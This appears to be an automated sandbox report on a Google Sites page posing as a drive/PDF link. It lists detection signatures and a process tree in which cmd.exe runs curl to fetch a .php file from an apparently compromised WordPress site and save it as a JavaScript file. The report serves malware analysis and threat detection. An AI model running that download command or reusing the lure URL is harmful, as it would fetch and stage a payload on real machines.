Analysis

max time kernel: 200s
max time network: 183s
platform: windows10-2004_x64
resource: win10v2004-20250502-en
resource tags: arch:x64, arch:x86, image:win10v2004-20250502-en, locale:en-us, os:windows10-2004-x64, system
submitted: 08/05/2025, 07:27

Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
  Sample: https://sites.google.com/view/drive-cx8JrJ/pdf?hid=68545392
  Resource: win10v2004-20250502-en
  3 signatures
  150 seconds
General

Target: https://sites.google.com/view/drive-cx8JrJ/pdf?hid=68545392
Score: 6/10
Malware Config
Signatures

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 5 IoCs)

  flow | ioc
  2    | sites.google.com
  4    | sites.google.com
  5    | sites.google.com
  35   | drive.google.com
  36   | drive.google.com

Suspicious use of WriteProcessMemory (10 IoCs)

  description                      | pid  | Process    | procid_target
  PID 3256 wrote to memory of 3832 | 3256 | chrome.exe | 94
  PID 3256 wrote to memory of 3832 | 3256 | chrome.exe | 94
  PID 3432 wrote to memory of 1572 | 3432 | cmd.exe    | 121
  PID 3432 wrote to memory of 1572 | 3432 | cmd.exe    | 121
  PID 3432 wrote to memory of 5040 | 3432 | cmd.exe    | 122
  PID 3432 wrote to memory of 5040 | 3432 | cmd.exe    | 122
  PID 3432 wrote to memory of 4300 | 3432 | cmd.exe    | 123
  PID 3432 wrote to memory of 4300 | 3432 | cmd.exe    | 123
  PID 3432 wrote to memory of 5104 | 3432 | cmd.exe    | 124
  PID 3432 wrote to memory of 5104 | 3432 | cmd.exe    | 124
Processes

(child processes are indented under their parent)

C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://sites.google.com/view/drive-cx8JrJ/pdf?hid=68545392
  PID: 3256
  Signatures: Suspicious use of WriteProcessMemory

    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffb440bdcf8,0x7ffb440bdd04,0x7ffb440bdd10
      PID: 3832

C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --field-trial-handle=5600,i,14626078333035697419,13825138210910656185,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5664 /prefetch:1
  PID: 644

C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --field-trial-handle=5392,i,14626078333035697419,13825138210910656185,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5792 /prefetch:1
  PID: 5040

C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --field-trial-handle=5992,i,14626078333035697419,13825138210910656185,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5968 /prefetch:1
  PID: 2740

C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --field-trial-handle=6132,i,14626078333035697419,13825138210910656185,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5996 /prefetch:1
  PID: 4720

C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --string-annotations --field-trial-handle=6328,i,14626078333035697419,13825138210910656185,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=6324 /prefetch:8
  PID: 976

C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --string-annotations --field-trial-handle=6336,i,14626078333035697419,13825138210910656185,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3320 /prefetch:8
  PID: 4068

C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --string-annotations --field-trial-handle=6352,i,14626078333035697419,13825138210910656185,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3200 /prefetch:8
  PID: 2900

C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=4560,i,14626078333035697419,13825138210910656185,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4512 /prefetch:8
  PID: 3272

C:\Windows\System32\rundll32.exe
  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
  PID: 1376

C:\Windows\system32\notepad.exe
  "C:\Windows\system32\notepad.exe"
  PID: 2252

C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe"
  PID: 3432
  Signatures: Suspicious use of WriteProcessMemory

    C:\Windows\system32\curl.exe
      curl.exe -s -o amk57qsh30t33t.js 'https://maconsmallbusinesses.com/wp-content/uploads/2018/08/urobenzoicHQ7v.php'
      PID: 1572

    C:\Windows\system32\curl.exe
      curl.exe
      PID: 5040

    C:\Windows\system32\curl.exe
      curl.exe -s -o amk57qsh30t33t.js 'https://maconsmallbusinesses.com/wp-content/uploads/2018/08/urobenzoicHQ7v.php'
      PID: 4300

    C:\Windows\system32\curl.exe
      curl.exe -s -o amk57qsh30t33t.js 'https://maconsmallbusinesses.com/wp-content/uploads/2018/08/urobenzoicHQ7v.php' -v
      PID: 5104